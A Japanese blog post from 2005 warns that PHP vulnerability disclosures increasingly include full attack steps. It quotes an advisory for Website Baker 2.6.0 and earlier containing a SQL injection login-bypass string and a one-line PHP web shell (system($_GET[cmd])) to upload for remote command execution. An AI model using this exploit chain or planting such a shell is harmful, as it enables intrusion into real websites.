最近の流行のPHPアプリ脆弱性公開と攻撃手法の解説

(更新日: 2005/12/13)

最近公開されているPHPアプリの攻撃手法には以前に見られない傾向があります。例えば、Wesite Bakerというアプリケーション(私はこのアプリが何なのかもしりません)ですが、SQLインジェクション脆弱性を使用しシステムに不正に侵入した後、丁寧に管理者であれば公開ディレクトリにファイルがアップロードできる仕様を利用して任意コマンド・スクリプトを実行する手順まで解説しています。

最近、親切(?)に脆弱性を攻撃する方法が解説されているケースが増えています。公開されているPHPのアプリケーションにはセキュリティ上問題が含まれている事が少なくありません。OSSであることは安全性の十分条件ではありません。公開されているアプリ、ツールを利用されている場合も細心の注意が必要です。

# これも使ったことがないですが、Zen-Cart(1.2.6d以下)も
# SQL Injection => リモートコマンド実行の脆弱性が公開され
# ています。利用されている方は必要な対処を早急に行うべきで
# す。

Website Baker <=2.6.0 SQL Injection -> Login bypass -A> remote code execution

software:
site: http://www.websitebaker.org/2/home/
description: “Website Baker 2, the Open Source Content Management System
designed to enable users to produce websites with ease.”

if magic_quotes_gpc off you can bypass admin login check and grant access
to administrative area, poc:

switch to:

http://[target]/[path_to_wb]/admin/

and login with:

user: ‘or isnull(1/0)/*
pass: [whatever]

now you can go to “Media” menu and upload a cmd.php file with this code inside:

<?php echo “Hi Master!”;error_reporting(0);ini_set(“max_execution_time”,0);system($_GET[cmd]);?>

Comments

comments

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です